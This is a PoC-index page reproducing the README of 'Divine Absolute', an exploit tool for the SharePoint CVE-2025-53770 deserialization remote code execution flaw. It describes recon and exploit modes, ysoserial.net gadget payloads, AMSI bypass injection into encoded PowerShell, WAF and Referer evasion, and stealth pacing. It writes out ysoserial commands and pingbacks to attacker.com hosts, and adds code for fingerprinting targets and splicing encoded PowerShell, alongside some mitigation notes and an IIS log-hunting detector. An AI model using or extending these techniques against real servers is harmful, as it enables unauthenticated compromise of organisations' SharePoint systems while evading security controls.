POC details: 320a76d8b672ce3cfe587e5807f0fd0e45c4971e

Source
Related vulnerability
Title: Microsoft SharePoint Server security vulnerability (CVE-2025-53770)
Description: Microsoft SharePoint Server is a collaboration platform from Microsoft. It contains a security vulnerability caused by deserialization of untrusted data, which can lead to remote code execution.
Description
A sophisticated, wizard-driven Python exploit tool targeting CVE-2025-53770, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition)
Introduction
# Divine Absolute - CVE-2025-53770 Exploit Tool

![License](https://img.shields.io/badge/license-MIT-blue.svg)  
![Python](https://img.shields.io/badge/python-3.8+-blue.svg)

## Overview

**Divine Absolute** is a sophisticated, wizard-driven Python exploit tool targeting **CVE-2025-53770**, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition). This vulnerability, disclosed as a zero-day on July 19, 2025, stems from deserialization of untrusted data in `/_layouts/15/ToolPane.aspx`. The tool is designed for **ethical penetration testing and authorized security research only**, offering unparalleled precision, stealth, and adaptability for reconnaissance, exploitation, and verification.

**Repository**: [https://github.com/exfil0/CVE-2025-53770](https://github.com/exfil0/CVE-2025-53770)

> **⚠️ Legal Warning**: This tool is for lawful, authorized use only in controlled environments with explicit permission. Unauthorized use against systems you do not own or have permission to test is illegal and may result in severe legal consequences. The author assumes no liability for misuse.

## Features

- **Modes**:
  - **Recon**: Detects SharePoint presence, version, and `ToolPane.aspx` accessibility with advanced scoring and regex (e.g., `16.0.0.\d+-\w+?`).
  - **Exploit**: Delivers payloads via `ToolPane.aspx` with robust bypasses.
  - **Full**: Combines recon and exploitation, with optional aggressive exploitation.
- **Payload Generation**:
  - Integrates **ysoserial.net** for .NET deserialization payloads (e.g., ObjectDataProvider, LosFormatter).
  - Optional **pythonnet** for fallback HTTP/DNS pingback payloads (e.g., `WebRequest.Create`, `Dns.GetHostEntry`).
  - Supports GZIP compression with explicit encoding/decoding and base64 validation.
  - Injects AMSI bypasses (basic reflection, obfuscated, or custom snippets) into PowerShell commands, including base64-encoded (`-enc`) payloads.
- **Bypasses**:
  - URI evasion: Random or fixed suffixes (e.g., `/xp.aspx`, UUID-based).
  - Referer spoofing: None, external domains (e.g., `www.google.com`), custom URLs, or internal SharePoint paths (e.g., `/_layouts/15/sharepoint.aspx`).
- **Stealth**:
  - Adaptive rate limiting with a minimum RPS floor (0.01) and burst control.
  - Thread-safe concurrency with lock-protected pacing and jitter (0-0.1s).
- **Verification**:
  - Robust RCE confirmation with compiled OR regexes, retries on `RequestException`, and customizable status codes/paths.
- **Reconnaissance**:
  - Enhanced SharePoint detection via headers (e.g., `MicrosoftSharePointTeamServices`), paths (e.g., `/versions.aspx`), and regexes.
- **Output**:
  - JSON results with forensic logging for analysis.
- **Usability**:
  - Interactive wizard for easy configuration.
  - Supports Mono/Wine for ysoserial.net on non-Windows systems.
  - Proxy support (HTTP/SOCKS5) and customizable timeouts.
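As an added illustration of the recon scoring described in the feature list (example code written for this page, not part of `divine_absolute.py`): it scores a single HTTP response on the SharePoint indicators named above and maps the advertised build to an edition. The header names are the ones SharePoint front ends actually emit, but the weights, the `_spPageContextInfo` body marker, the threshold and the build-number ranges are this example's own assumptions, and the sample responses are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample responses (not real captures). A SharePoint front end
# normally advertises itself in the MicrosoftSharePointTeamServices header;
# the _spPageContextInfo marker appears on rendered SharePoint pages.
SP_HEADERS = {
    "Server": "Microsoft-IIS/10.0",
    "MicrosoftSharePointTeamServices": "16.0.0.10396",
    "X-Powered-By": "ASP.NET",
    "SPRequestGuid": "0b1c2d3e-0000-4000-8000-000000000001",
}
SP_BODY = '<script>var _spPageContextInfo = {"webServerRelativeUrl":"/"};</script>'
PLAIN_IIS_HEADERS = {"Server": "Microsoft-IIS/10.0", "X-Powered-By": "ASP.NET"}
PLAIN_BODY = "<html><body>Welcome</body></html>"

# 15.x = SharePoint 2013, 16.x = 2016/2019/Subscription Edition. The header
# usually carries the build in the last component (16.0.0.10396) while page
# assets use the long form (16.0.10396.20000); the regex accepts both.
VERSION_RE = re.compile(r"\b(1[56])\.0\.(\d{1,5})\.(\d{1,5})\b")


@dataclass
class Fingerprint:
    score: int = 0
    version: Optional[str] = None
    edition: Optional[str] = None
    evidence: List[str] = field(default_factory=list)

    @property
    def is_sharepoint(self) -> bool:
        # Threshold chosen so a bare IIS/ASP.NET box never qualifies on its own.
        return self.score >= 3


def edition_from_version(version: str) -> Optional[str]:
    """Map a version string to an edition using public RTM build numbers
    (2016: 16.0.4351, 2019: 16.0.10337, Subscription Edition: 16.0.14326).
    Heuristic only: treat the result as a hint, not ground truth."""
    m = VERSION_RE.search(version)
    if not m:
        return None
    major, a, b = m.group(1), int(m.group(2)), int(m.group(3))
    if major == "15":
        return "2013"
    build = a if a else b  # short header form keeps the build in the last slot
    if build >= 14326:
        return "Subscription Edition"
    if build >= 10337:
        return "2019"
    if build >= 4351:
        return "2016"
    return None


def fingerprint(headers: Dict[str, str], body: str = "") -> Fingerprint:
    """Score one HTTP response for SharePoint indicators (weights are this example's)."""
    fp = Fingerprint()
    lowered = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive

    if "microsoftsharepointteamservices" in lowered:
        fp.score += 3
        fp.evidence.append("MicrosoftSharePointTeamServices header")
        fp.version = lowered["microsoftsharepointteamservices"].strip()
    if "sprequestguid" in lowered:
        fp.score += 1
        fp.evidence.append("SPRequestGuid header")
    if "_spPageContextInfo" in body:
        fp.score += 1
        fp.evidence.append("_spPageContextInfo in body")
    if fp.version is None:
        m = VERSION_RE.search(body)
        if m:
            fp.version = m.group(0)
            fp.score += 1
            fp.evidence.append("version string in body")
    if fp.version:
        fp.edition = edition_from_version(fp.version)
    return fp


if __name__ == "__main__":
    for name, h, b in (("sharepoint", SP_HEADERS, SP_BODY), ("plain-iis", PLAIN_IIS_HEADERS, PLAIN_BODY)):
        fp = fingerprint(h, b)
        print(name, fp.is_sharepoint, fp.version, fp.edition, fp.evidence)
```

Feeding it a real response is a matter of passing `resp.headers` and `resp.text` from `requests`; keeping the scoring pure makes it easy to unit-test against saved responses before pointing it at a target.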

## CVE-2025-53770 Context

- **Vulnerability**: Unauthenticated RCE via deserialization in `/_layouts/15/ToolPane.aspx`.
- **Affected**: SharePoint Server 2016, 2019, and Subscription Edition. End-of-life 2010/2013 are not listed in Microsoft's advisory and receive no fix; treat them as vulnerable and migrate.
- **Unaffected**: SharePoint Online (M365).
- **Exploited**: In the wild since July 18, 2025, in the campaign tracked as "ToolShell"; Microsoft attributes activity to Linen Typhoon, Violet Typhoon and Storm-2603.
- **Patches**: Microsoft published the advisory on July 19, 2025 and out-of-band updates followed over the next days (e.g., KB5002768 for Subscription Edition, KB5002754 for 2019, with a separate update for 2016). CISA added the CVE to KEV with a federal remediation deadline of July 21, 2025. Patching closes the deserialization path but does not invalidate ASP.NET machine keys already stolen from a compromised server, hence the key rotation below.
- **Mitigations**: Patch, then rotate the ASP.NET machine keys and restart IIS; enable AMSI in Full Mode with Defender Antivirus; alert on POST requests to `/_layouts/15/ToolPane.aspx` (especially with `DisplayMode=Edit` and a Referer of `/_layouts/SignOut.aspx`); apply WAF rules (e.g., Cloudflare); disconnect servers that cannot be patched from the internet.
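The monitoring item above is the check a defender wants in hand, so here is an added example (not from the project) that hunts IIS W3C logs for the ToolPane.aspx pattern. The log lines are constructed, the field layout is the IIS default, and the severity levels are the example's own choices; the `/_layouts/SignOut.aspx` Referer and the `spinstall0.aspx` file name come from public reporting on the ToolShell campaign. The last record shows the edge case that matters in practice: an authenticated user editing a page also POSTs to ToolPane.aspx, so that traffic is kept for review rather than alerted on.

```python
import re
from typing import Dict, Iterable, List

# Constructed IIS W3C log excerpt (not a real capture). IIS writes "-" for
# empty fields and replaces spaces in User-Agent/Referer with "+", so the
# records split cleanly on whitespace.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 03:12:44 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\\alice 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.com/ 200 0 0 31
2025-07-19 03:13:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) /_layouts/SignOut.aspx 200 0 0 118
2025-07-19 03:13:05 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 12
2025-07-19 03:15:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\\bob 10.0.0.22 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.com/sites/hr/SitePages/Home.aspx 200 0 0 45
"""

TOOLPANE_RE = re.compile(r"^/_layouts/1[56]/toolpane\.aspx$", re.I)
# spinstall0.aspx is the reported name; the wildcard also catches renamed copies.
SPINSTALL_RE = re.compile(r"^/_layouts/1[56]/spinstall\w*\.aspx$", re.I)


def parse_iis_w3c(text: str) -> Iterable[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the #Fields: directive."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed record; in production count and surface these
        yield dict(zip(fields, parts))


def score_toolshell(rec: Dict[str, str]) -> Dict[str, object]:
    """Severity 0 = ignore, 1 = keep for review, 2 = alert (thresholds are this example's)."""
    method = rec.get("cs-method", "")
    stem = rec.get("cs-uri-stem", "")
    query = rec.get("cs-uri-query", "-")
    user = rec.get("cs-username", "-")
    referer = rec.get("cs(Referer)", "-")
    reasons: List[str] = []
    severity = 0

    if SPINSTALL_RE.match(stem):
        severity = 2
        reasons.append("request to spinstall*.aspx (reported post-exploitation web shell)")

    if method.upper() == "POST" and TOOLPANE_RE.match(stem):
        reasons.append("POST to ToolPane.aspx")
        if "displaymode=edit" in query.lower():
            reasons.append("DisplayMode=Edit")
        if "/_layouts/signout.aspx" in referer.lower():
            severity = 2
            reasons.append("Referer /_layouts/SignOut.aspx (ToolShell IOC)")
        elif user == "-":
            severity = max(severity, 2)
            reasons.append("unauthenticated (cs-username '-')")
        else:
            # Authenticated page editing legitimately POSTs to ToolPane.aspx;
            # keep it for baselining rather than paging anyone.
            severity = max(severity, 1)

    return {
        "severity": severity,
        "time": f"{rec.get('date')} {rec.get('time')}",
        "client": rec.get("c-ip"),
        "reasons": reasons,
    }


def hunt(text: str) -> List[Dict[str, object]]:
    """Return every record with non-zero severity, in log order."""
    return [v for v in (score_toolshell(r) for r in parse_iis_w3c(text)) if v["severity"] > 0]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["severity"], hit["time"], hit["client"], "; ".join(hit["reasons"]))
```

Run it over the real files under `%SystemDrive%\inetpub\logs\LogFiles\W3SVC*` with `hunt(open(path).read())`; if your farm uses a custom field selection the `#Fields:` line is still honoured, as long as `cs-username`, `cs(Referer)` and `cs-uri-query` are being logged.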

## Installation

### Prerequisites

- **Python 3.8+**
- **Dependencies**:
  ```bash
  pip install requests termcolor
  ```
- **Optional (for .NET serialization fallback)**:
  ```bash
  pip install pythonnet
  ```
- **ysoserial.net**:
  - Download from [ysoserial.net releases](https://github.com/pwntester/ysoserial.net/releases).
  - Place `ysoserial.exe` in a known path (e.g., `./ysoserial.exe`).
- **Mono/Wine** (non-Windows systems):
  ```bash
  # Ubuntu/Debian
  sudo apt-get install mono-complete
  # macOS (via Homebrew)
  brew install mono
  ```
- **Lab target** (recommended for testing):
  Microsoft does not publish a SharePoint Server container image on `mcr.microsoft.com`, and SharePoint Server is not supported in containers. Build the lab from a Windows Server VM with an unpatched SharePoint Server 2019 or Subscription Edition install, isolated from production networks.

### Setup

1. Clone the repository:
   ```bash
   git clone https://github.com/exfil0/CVE-2025-53770.git
   cd CVE-2025-53770
   ```
2. Install Python dependencies:
   ```bash
   pip install -r requirements.txt
   ```
3. Ensure `ysoserial.exe` is accessible or provide its path during execution.
4. (Optional) Verify Mono/Wine for non-Windows systems.

## Usage

Run the interactive wizard:
```bash
python divine_absolute.py
```

### Workflow

1. **Mode Selection**:
   - `Recon`: Scans for SharePoint presence and version.
   - `Exploit`: Sends payload to `ToolPane.aspx`.
   - `Full`: Recon + exploit (optional aggressive mode).
2. **Target Input**:
   - Single URL (e.g., `https://sharepoint.example.com`).
   - File with URLs (one per line).
3. **Payload Configuration**:
   - **ysoserial.net**: Specify path, gadget (e.g., `ObjectDataProvider`), and command (e.g., `cmd /c whoami`).
   - **File**: Load base64 GZIP payload from file.
   - **String**: Input base64 GZIP payload directly.
   - **Pingback**: Generate HTTP/DNS pingback (e.g., `http://attacker.com/callback` or `sub.attacker.com`).
   - AMSI bypass: Choose `NONE`, `BASIC_REFLECTION`, `CONCAT_OBFUSCATED`, or custom snippet.
4. **Bypass Options**:
   - URI: `NONE`, `FIXED` (e.g., `/xp.aspx`), `RANDOM` (UUID-based).
   - Referer: `DEFAULT_SP`, `NO_REFERER`, `RANDOM_EXTERNAL`, `CUSTOM_URL`.
5. **Network Settings**:
   - Proxy (e.g., `http://127.0.0.1:8080`).
   - Threads, timeout, jitter, and rate limit (RPS).
6. **RCE Verification**:
   - Specify path (e.g., `/sitepages/result.txt`), regexes (e.g., `Xanthorox.*`), status codes (e.g., `200,403`), attempts, delay, and timeout. The path is fetched over HTTP, so the payload's command must write the marker file somewhere IIS serves from disk (for example the `LAYOUTS` template directory behind `/_layouts/15/`); SharePoint libraries such as `/sitepages/` live in the content database, and a file dropped on disk under that name will not be served.

### Example Commands

- **Reconnaissance**:
  ```bash
  python divine_absolute.py
  # Select: Mode=Recon, Target=https://sharepoint.example.com
  ```
- **Exploit with ysoserial.net**:
  ```bash
  python divine_absolute.py
  # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
  #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
  #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
  ```
- **Full Mode with Verification**:
  ```bash
  python divine_absolute.py
  # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
  #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
  # Verify Path must be a location IIS serves from disk; /sitepages/ is a
  # content-database library, so pick a path that matches where the payload writes.
  ```
- **DNS Pingback**:
  ```bash
  python divine_absolute.py
  # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
  ```

### Output

Results are saved in `xanthorox_results.json` with fields:
- `target`: URL tested.
- `sharepoint_detected`: Boolean.
- `toolpane_accessible`: Boolean.
- `exploited`: Boolean (payload sent).
- `verified_rce`: Boolean/None (RCE confirmed).
- `error`: Any errors encountered.

Example:
```json
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]
```

## Improvements Addressed

This version fixes:
- **Adaptive Rate Limiting**: Ignores non-retry errors (e.g., 404) for success/error counts; enforces a minimum RPS floor (0.01).
- **AMSI Injection**: Decodes and injects bypasses into base64-encoded PowerShell (`-enc`) commands; supports non-PowerShell (e.g., `cmd.exe`) with warnings.
- **Pingback Fallback**: Uses `pythonnet` for reliable DNS pingback with `Dns.GetHostEntry` (experimental, requires gadget for full effect).
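To show the `-enc` handling described in this item and under **Payload Generation** above, an added example (not the tool's code): it decodes a base64/UTF-16LE PowerShell command, splices a prefix in front of it and re-encodes, falls back to inline `-Command "..."` strings, and leaves non-PowerShell command lines untouched with a `skipped` status. The prefix is a harmless placeholder standing in for whatever snippet the operator chooses; the regexes and helper names are the example's own assumptions.

```python
import base64
import re
from typing import Tuple

# Placeholder prefix for demonstration only: the tool's bypass snippets are its
# own; a harmless preference statement is enough to show the splicing mechanics.
DEMO_PREFIX = "$ProgressPreference = 'SilentlyContinue'"

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob. The \s+ keeps
# "-ep Bypass" (execution policy) from being mistaken for an encoded command.
ENC_RE = re.compile(r"(?i)(?P<flag>-(?:e|ec|enc|encodedcommand))\s+(?P<b64>[A-Za-z0-9+/]+=*)")
# -c / -Command with a double-quoted script (the inline form the wizard accepts).
INLINE_RE = re.compile(r'(?i)(?P<flag>-(?:c|command))\s+"(?P<script>[^"]*)"')
# First token is powershell/pwsh, bare or with a (possibly quoted) path.
PS_EXE_RE = re.compile(r'^\s*"?(?:[^"\s]*[\\/])?(?:powershell|pwsh)(?:\.exe)?"?(?=\s|$)', re.I)


def ps_encode(script: str) -> str:
    """-EncodedCommand expects base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def ps_decode(blob: str) -> str:
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even byte length")
    return raw.decode("utf-16le")


def inject_prefix(command: str, prefix: str = DEMO_PREFIX) -> Tuple[str, str]:
    """Return (new_command, status) where status is 'encoded', 'inline' or 'skipped'."""
    if not PS_EXE_RE.match(command):
        return command, "skipped"  # e.g. "cmd /c ...": nothing to splice into

    m = ENC_RE.search(command)
    if m:
        script = ps_decode(m.group("b64"))
        new_blob = ps_encode(f"{prefix}; {script}")
        return command[: m.start("b64")] + new_blob + command[m.end("b64"):], "encoded"

    m = INLINE_RE.search(command)
    if m:
        spliced = command[: m.start("script")] + f"{prefix}; " + command[m.start("script"):]
        return spliced, "inline"

    return command, "skipped"  # PowerShell invoked without an inline or encoded script


if __name__ == "__main__":
    original = "powershell.exe -NoP -W Hidden -enc " + ps_encode("Write-Output (hostname)")
    for cmd in (original, 'powershell -c "Get-Date"', r"cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"):
        new_cmd, status = inject_prefix(cmd)
        print(status, "->", new_cmd)
```

The point of decoding and re-encoding rather than concatenating base64 strings is that UTF-16LE code units cannot be joined at the base64 layer; any splice must happen on the decoded script and the whole thing re-encoded, which is also why the decoder rejects odd-length blobs instead of silently producing garbage.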

## Testing Recommendations

- **Lab Setup**: Use an isolated, unpatched SharePoint Server 2019 (or Subscription Edition) VM for safe testing; no official Docker image exists for SharePoint Server.
- **WAF Testing**: Validate bypasses against Cloudflare or similar WAFs with adaptive RPS.
- **Payload Testing**: Generate payloads with `ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64` and confirm the lookup in your DNS logs. Not every gadget supports every formatter; `ysoserial.exe --help` lists the formatters each gadget accepts, so check the gadget/formatter pair before relying on the output.

## Known Limitations

- **Pingback Reliability**: `Dns.GetHostEntry` in `pythonnet` may not trigger without a specific gadget chain.
- **Complex Commands**: Non-standard PowerShell commands may require manual AMSI bypass injection.
- **WAF Detection**: Some WAFs may block payloads despite bypasses; test thoroughly.

## Contributing

Contributions are welcome! Please:
1. Fork the repository.
2. Create a feature branch (`git checkout -b feature/awesome-improvement`).
3. Commit changes (`git commit -m "Add awesome improvement"`).
4. Push to the branch (`git push origin feature/awesome-improvement`).
5. Open a pull request.

## License

This project is licensed under the MIT License. See [LICENSE](LICENSE) for details.

## Acknowledgments

- **xAI**: For inspiring cutting-edge security research.
- **ysoserial.net Team**: For the .NET deserialization payload generator.
- **Security Community**: For insights into CVE-2025-53770 exploitation and mitigations.

## Contact

- **Author**: @exfil0
- **Issues**: [GitHub Issues](https://github.com/exfil0/CVE-2025-53770/issues)
- **Telegram**: [https://t.me/GOTOCVE](https://t.me/GOTOCVE)

> **Note**: Always verify payloads and configurations in a controlled lab before use. Stay ethical, stay legal.
File snapshot

```text
[4.0K]  /data/pocs/320a76d8b672ce3cfe587e5807f0fd0e45c4971e
├── [ 68K]  divine_absolute.py
├── [9.2K]  README.md
└── [  51]  requirements.txt

0 directories, 3 files
```